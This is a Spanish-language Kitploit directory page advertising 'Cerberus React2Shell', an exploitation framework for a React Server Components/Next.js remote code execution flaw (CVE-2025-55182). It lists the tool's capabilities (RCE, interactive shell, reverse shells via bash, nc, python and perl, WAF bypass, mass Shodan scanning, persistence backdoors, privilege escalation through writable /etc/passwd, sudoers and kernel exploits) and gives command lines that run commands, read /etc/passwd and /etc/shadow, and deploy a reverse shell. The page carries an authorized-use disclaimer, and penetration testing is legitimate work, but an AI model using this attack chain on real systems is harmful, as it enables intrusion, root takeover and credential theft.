Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Cerberus-React2Shell-Scanner-Exploit — Elite exploitation toolkit para CVE-2025-55182 (RCE en React Server Components). Payloads polimórficos asíncronos, bypass avanzado de WAF/CDN, rotación de proxies, escaneo masivo en Shodan/Censys, auto-pwn + shells inversas, plantillas Nuclei, laboratorio K8s y panel C2. Creado por Sudeepa Wanigarathna – estrictamente para uso autorizado en red team y pruebas de penetración. | Kitploit
Herramientas/GitHubGitHub/cerberusmrxi/cerberus-react2shell-scanner-exploit
Frameworks de Pruebas de PenetraciónEscalada de PrivilegiosEscáneres de VulnerabilidadesFrameworks de ExploitsShellcodeExplotación de Aplicaciones WebPost-ExplotaciónComando y ControlAprendizaje y Educación
Red Teaming
Desarrollo de Payloads
Labs y Práctica
GitHubcerberusmrxi/cerberus-react2shell-scanner-exploit

Cerberus-React2Shell-Scanner-Exploit

Ver Repositorio
218hace 17 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

Elite exploitation toolkit para CVE-2025-55182 (RCE en React Server Components). Payloads polimórficos asíncronos, bypass avanzado de WAF/CDN, rotación de proxies, escaneo masivo en Shodan/Censys, auto-pwn + shells inversas, plantillas Nuclei, laboratorio K8s y panel C2. Creado por Sudeepa Wanigarathna – estrictamente para uso autorizado en red team y pruebas de penetración.

Compartir

Cerberus React2Shell - Framework de Explotación Armado

root@kitploit:~
  ██████╗ ███████╗██████╗ ██████╗ ███████╗██████╗ ██╗   ██╗
 ██╔════╝ ██╔════╝██╔══██╗██╔══██╗██╔════╝██╔══██╗██║   ██║
 ██║      █████╗  ██████╔╝██████╔╝█████╗  ██████╔╝██║   ██║
 ██║      ██╔══╝  ██╔══██╗██╔══██╗██╔══╝  ██╔══██╗██║   ██║
 ╚██████╗ ███████╗██║  ██║██████╔╝███████╗██║  ██║╚██████╔╝
  ╚═════╝ ╚══════╝╚═╝  ╚═╝╚═════╝ ╚══════╝╚═╝  ╚═╝ ╚═════╝
  
         React2Shell Exploitation Framework v1.0
              Author: Sudeepa Wanigarathna

🎯 Descripción General

Framework de explotación de nivel profesional para la vulnerabilidad de ejecución remota de código (RCE) en Server Actions de Next.js (React2Shell). Demuestra la cadena de ataque completa, desde el acceso inicial hasta la escalada de privilegios a root.

Capacidades:

  • ✅ Detección automatizada de vulnerabilidades
  • ✅ Ejecución remota de código (RCE)
  • ✅ Acceso a shell interactivo
  • ✅ Enumeración de sistemas Linux
  • ✅ Escalada de privilegios automatizada
  • ✅ Despliegue de reverse shell
  • ✅ Subida/descarga de archivos
  • ✅ Demostración de acceso root

🚀 Inicio Rápido

RCE Básico

root@kitploit:~
# Verificar vulnerabilidad
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check

# Ejecutar comando
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id"

Shell Interactivo

root@kitploit:~
python3 interactive_shell.py --target http://127.0.0.1:3000

Cadena de Ataque Automatizada Completa

root@kitploit:~
# Explotación completa: RCE → Enumeración → Acceso Root
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root

📁 Estructura del Framework

root@kitploit:~
Cerberus-React2Shell-Hades/
├── react2shell_exploit.py      # Motor de explotación principal (400+ líneas)
├── demo_exploit.py              # Cadena de ataque automatizada (290+ líneas)
├── interactive_shell.py         # Shell interactivo (280+ líneas)
├── reverse_shell_handler.py     # Listener de reverse shell (180+ líneas)
├── post_exploit/
│   ├── linux_enum.py           # Enumeración del sistema (330+ líneas)
│   ├── priv_esc.py             # Escalada de privilegios (320+ líneas)
│   └── __init__.py
├── EXPLOITATION_GUIDE.md        # Documentación completa de uso
├── QUICKSTART.md                # Referencia rápida
└── BANNER.txt

🔥 Características

Motor de Explotación Principal

  • Descubrimiento de Action ID: Extracción automática de los bundles de JavaScript
  • Múltiples Payloads: Variantes de execSync, spawn, eval, mainModule
  • Extracción de Salida: Parseo de la salida de comandos desde las respuestas de error
  • Bypass de WAF: Técnicas de ofuscación de payloads

Post-Explotación

  • Enumeración de Linux: Binarios SUID/SGID, rutas escribibles, cron jobs, versión del kernel
  • Escalada de Privilegios: GTFOBins, archivos /etc escribibles, escape de Docker, capacidades
  • Operaciones con Archivos: Subida/descarga con codificación base64
  • Persistencia: Múltiples métodos de backdoor

Herramientas Interactivas

  • Shell Interactivo: Ejecución de comandos en tiempo real con comandos integrados
  • Reverse Shell: Múltiples tipos de shell (bash, python, nc, perl)
  • Modo Demo: Demostración automatizada de 6 pasos

📖 Ejemplos de Uso

1. Comandos Básicos

root@kitploit:~
# Verificación de vulnerabilidad
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check

# Ejecutar comandos
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "whoami"
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "cat /etc/passwd"

# Diferentes variantes de payload
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --variant spawn

# Con ofuscación
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --obfuscate

2. Shell Interactivo

root@kitploit:~
# Lanzar shell
python3 interactive_shell.py --target http://127.0.0.1:3000

# Comandos disponibles:
# - execute <cmd>        : Ejecutar comando de shell
# - enum                 : Ejecutar enumeración completa
# - escalate             : Intentar escalada de privilegios
# - upload <local> <remote>  : Subir archivo
# - download <remote> <local>: Descargar archivo
# - shell <lhost> <lport>: Desplegar reverse shell
# - info                 : Mostrar información de la sesión
# - exit                 : Salir

3. Reverse Shell

root@kitploit:~
# Terminal 1: Iniciar listener
python3 reverse_shell_handler.py --lport 4444

# Terminal 2: Desplegar shell
python3 react2shell_exploit.py --target http://127.0.0.1:3000 \
  --revshell --lhost 127.0.0.1 --lport 4444 --shell-type bash

4. Demo Automatizada

root@kitploit:~
# Cadena completa: Descubrimiento → RCE → Enumeración → Root
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root

🎯 Cadena de Ataque

El framework implementa una cadena de explotación completa de 6 pasos:

  1. Descubrimiento - Extraer los Server Action IDs de los bundles de JavaScript
  2. Explotación - Encontrar un Action ID funcional y lograr RCE
  3. Verificación - Confirmar la ejecución de código con el comando id
  4. Enumeración - Recopilar información del sistema, binarios SUID, rutas escribibles
  5. Escalada - Explotar automáticamente los vectores de escalada de privilegios
  6. Demostración - Probar el acceso root leyendo /etc/shadow y listando /root

🛡️ Técnicas de Escalada de Privilegios

Métodos Implementados

  1. Binarios SUID (GTFOBins)

    • find, vim, python, perl, bash, awk, sed, less, more, nmap
  2. Archivos /etc Escribibles

    • /etc/passwd - Añadir nuevo usuario root
    • /etc/shadow - Limpiar la contraseña de root
    • /etc/sudoers - Otorgar sudo NOPASSWD
  3. Escape de Docker

    • Explotación del socket de Docker accesible
    • Escape de contenedores privilegiados
  4. Exploits del Kernel

    • DirtyCow (CVE-2016-5195)
    • Dirty Pipe (CVE-2022-0847)
    • PwnKit (CVE-2021-4034)
  5. Capacidades de Linux

    • Explotación de CAP_SETUID, CAP_DAC_OVERRIDE

📊 Estadísticas

  • Total de Líneas de Código: 1,800+
  • Módulos: 8
  • Técnicas de Escalada de Privilegios: 5
  • Variantes de Payload: 4
  • Tipos de Shell: 4 (bash, python, nc, perl)

⚙️ Requisitos

root@kitploit:~
pip install -r requirements.txt

Dependencias:

  • requests
  • colorama

📚 Documentación

  • EXPLOITATION_GUIDE.md - Guía de uso completa con ejemplos
  • QUICKSTART.md - Referencia rápida para comandos comunes

⚠️ Aviso Legal

ADVERTENCIA: Esta herramienta es solo para pruebas de seguridad autorizadas. El acceso no autorizado a sistemas informáticos es ilegal. Úsala únicamente en sistemas que poseas o para los que tengas permiso explícito por escrito.

El autor no es responsable del mal uso de esta herramienta. Úsala bajo tu propio riesgo.

🎓 Propósito Educativo

Este framework está diseñado para:

  • Investigadores de seguridad que estudian vulnerabilidades de Next.js
  • Probadores de penetración con autorización
  • Formación en seguridad y desafíos CTF
  • Investigación de vulnerabilidades en entornos de laboratorio controlados

📄 Licencia

Licencia MIT (Solo con Fines Educativos)

👤 Autor

Sudeepa Wanigarathna

  • Experto en Desarrollo de Exploits
  • Investigador de Seguridad
  • Probador de Penetración

Versión: 1.0
Última Actualización: Diciembre 2025

Para instrucciones de uso detalladas, consulta EXPLOITATION_GUIDE.md

Descargar herramienta